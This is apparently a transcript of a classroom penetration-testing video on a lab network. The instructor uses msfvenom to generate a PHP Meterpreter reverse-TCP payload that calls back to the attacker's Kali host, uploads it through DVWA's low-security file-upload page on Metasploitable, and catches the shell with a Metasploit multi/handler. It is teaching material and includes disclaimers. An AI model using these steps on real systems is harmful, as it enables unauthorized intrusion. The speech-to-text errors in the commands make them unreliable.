Good morning, everyone. Good afternoon, wherever you are. In this video tutorial, I will show you how to perform upload malicious files on web application penetration testing. Okay, so without further ado, let me show you the things that I have here. I have a Kali Linux here, right? So let's see. I'm going to do ifconfig and let me see what's the IP address. So I will make a note of it. So here is 192. My Kali is going to be 192.168.1.103. Okay, and then my metasploitable, let me see, ifconfig. So I have 1.104. So my meta, which is my victim machine, is going to be 1.104, right? So I'm going to ping this 192.168. Oh, let me see. I'm going to ping 192.168 dot 1.103, right? So I'm going to ping, so it's working, right? And now I can try from the Kali to the meta. So I'm going to ping 192, ping 192, 168, 1.104 ping. Now it's also working. So we set up the environment correctly, all right? So the next thing that we're gonna use is what you call this? This is called MSS. What you call this? MSF Venom, right? So let me see. Exploitation, web application, exploitation tool, Metasploit framework. Okay, I'm going to use this and type Kali. All right. Okay. Make sure you do a sudo apt update, right? Sudo apt update in order to update all the repository. Okay, to update all the repository. So now I'm going to use MSF Venom. Okay, I will provide this note in the Blackboard, right? So student will have the documentation and notes, right? MSF Venom is a standalone payload generator. Okay, it is a combination of MSF payload and MSF encode, right? It's a fast and uses a single instances, right? It's also standardized command line and has core option. You can generate payload for many platforms like Cisco, Android, Mac OS, and so on. So this is kind of a very useful tool. Okay, so I'm going to minimize this and let's do MSF Venom. Okay, MSF Venom minus P payload, right? PHP slash metapreader, right? Reverse shell, right? Reverse underscore TCP. The L host is, the local host is 103, right? The local host is 103, so I'm going to use local host equal to 192.168.1.103, okay? And L port, we're gonna use 444, 1, 2, 3, 4, and then we're gonna save this as download the output -o, okay? And we're gonna put this in the download folders, and we're gonna name this php underscore venom.php, okay? All right. So now we are able to create this one, right? This payload, PHP Venom. Okay. Let me show you this one. So we're gonna use reverse TCP, right? So what is a bind shell and reverse shell, right? So let me see if I can explain this, right? Uh, bind shell is bind shell. There are two popular type of shell, right? Bind and reverse shell. The bind shell open a new surface on the target machine and require the attacker to connect to it for the session. So if this is your attacker machine, you need to have a new service on the target machine and require the attacker to connect it to for the session. On the other hand, the reverse shell is also known connect back, right? So it requires the attacker to set up a listener first on his box, and then the target machine acts as a client connected to that listener server, right? And then finally the attacker receives the shell, right? So make sure you know the difference, all right? And as usual, right? As usual, that the content of this video are for educational purpose only. So students should and must practice this penetration testing lab in the sandbox environment, right? In the sandbox environment. People must obtain a written authorization before conducting ethical hacking for in the real world situation, right? Always check with the federal, state, and local authorities before doing any ethical hacking or penetration testing, all right? So remember that word, right? So now we just finished creating. So make sure that you understand the disclaimer, all right? With whatsoever that the information in this video is used to harm other people or other organization, right? It's strictly for educational. So let's go to the Kali again. So we are successfully create a payload, right? So now we gotta go to CD. And by the way, we can do like this one, MSF Venom _H, right? Helps. It show you all the things here. Perhaps, in case you are not familiar with the command here, right? -P is the payload, right? And -O is the output. Save the payload to a file, right? So if you're not familiar with this, always go to MSF Venom space -H, right? Helps. So you can see all the argument or option that we need to do. As you can see that this is the example of the command that we use. All right. What else here we need to do? So I'm going to clear this one, and then we're going to go to CD download, right? And we're going to go to LS to check that. Now we have the PHP _venom.php, and then we're gonna go to nano. We're gonna use nano PHP _venom.php, right? All right. So we need to remove this, right? We need to remove this command, right? So here we're gonna remove this command, okay? We're gonna remove this command, and then we're gonna save it again. You press Control O to write out yes. We're gonna put yes, and then we go to Control X to exit, right? So that's we're gonna use nano. If we want to check again, we can run this command. Now the command is disappear, right? So Control X. Sometimes it's a good idea that we perform this lab slowly and we read slowly and type slowly and do slowly also, right? So that way that way we can perform the lab successfully, right? All right. So now let's go to DVWA. So I'm going to open my Firefox browsers, and let's type this one. One night we're gonna type this 192.168.1.104, right? Boom, proxy refuse. So let me remove my proxy because I use this machine for other lab exercise also, right? So remove this. Okay, no proxy, right? All right, and this one apparently I have an end on. Let's see, disable. I use Foxy proxy, so I'm gonna disable this, right? I'm gonna disable this, and let's review this again. So I'm gonna close this and reload again. All right, now it's working. Okay, the next step is what's the next step? Okay, the next step, we're gonna go to DVWA, and then we're gonna log in. As you can see that the username is admin, and then the password is password, right? So I'm going to use this, login. Okay, don't save, and look at the security. We always need to put it low, okay? Because we just want to do the testing, the proof of concept. We're gonna submit this, all right? So after we have this, what we're gonna do next here? We have this, and let's upload the file, right? And then we're gonna upload the files, right? Let me see what's the next one here, right? So after we do this, I'm going to scroll down, and we're gonna upload the file, okay? And go upload the file in the left-hand panel, all right? So let me see. Here is my, where's my Kali here? Okay, I'm going to file upload, right? Upload malicious file. I'm gonna browse and go to the download, and you see this payload? Click this one and upload. All right. All right. So now we are successfully upload, right? So once we have do this, we're gonna go to the MSF console, right, in the Kali, right? I'm going to open a new one. I'm going to open a new this one. What is this? This is okay. Okay, we can use this one. Clear. I'm going to clear this, and I'm going to type use exploit multi slash handler, right? Use exploit multi-handler, and then enter. Okay, sudo apt install. Okay, let me see. Sudo apt, let me see. Sudo apt install. Okay, let me see. Use exploit multi-handler. Okay. Okay, I think I need to go here. Hold on. I need to go to the here. Using I need to run this in the environment. So I'm going to exploitation tool, Metasploit framework. I need to be in there network, in that tools. Okay. So I need to be in the Metasploitable framework, and I'm going to use exploit slash multi slash handler, right? Handler, okay. And then we're gonna use what? we're gonna use show option, right? Show option, okay? And then we're gonna set up this one, right? We're going to set up we're gonna use exploit. We're gonna set L host, local host, right? Local host is 192.168.1.103, okay? And then we're gonna set payload.php. Let me see my note. I just doesn't want to have this issue here. Set payload, right? Set payload, okay. Set payload php slash meter breeder slash reverse underscore TCP, right? TCP, like that. All right. Let me see. I just want to make sure that all right, reverse TCP IP, and then I'm going to click run, right? Once you finish, type run, okay? So I'm going to do like this. I'm going to type run. Let me see. I'm going to click this run, right? I'm going to run this. Okay, now we're starting this one. And now here, let me see if we can go to DEM vulnerabilities. Then I'm going to click this. Let me see. Now I'm going to go to this website called, on the top, hack cable upload, right? DVW. This one, hack cable, right? Hack cable slash uploads. This one, right? And then enters, right? With S, enter, like this. All right, as you can see that, we have the PNG here, right? And then if I go back, now you can see the file is over there, right? As you can see there, let's go to the shell here. Where is my shell here? Where is my thingy here? No, it's not in here. Let me see. Where is this? I'm going to close this. I'm going to close this. Okay, here, and my here is over there, right? So we run this. Now the meter is working, right? So let's do ls. Now you can see that we are successfully hacked into the system, right? So if student perform this lab exercise, get a screenshot of this one, right? Using snapping tools, highlight from the top to the bottom here frame and send me the result of this. All right, and hopefully that this video is informative to you, and if you need some additional help, log into Discord for lab assistant. Thank you so much and have a great day. Bye.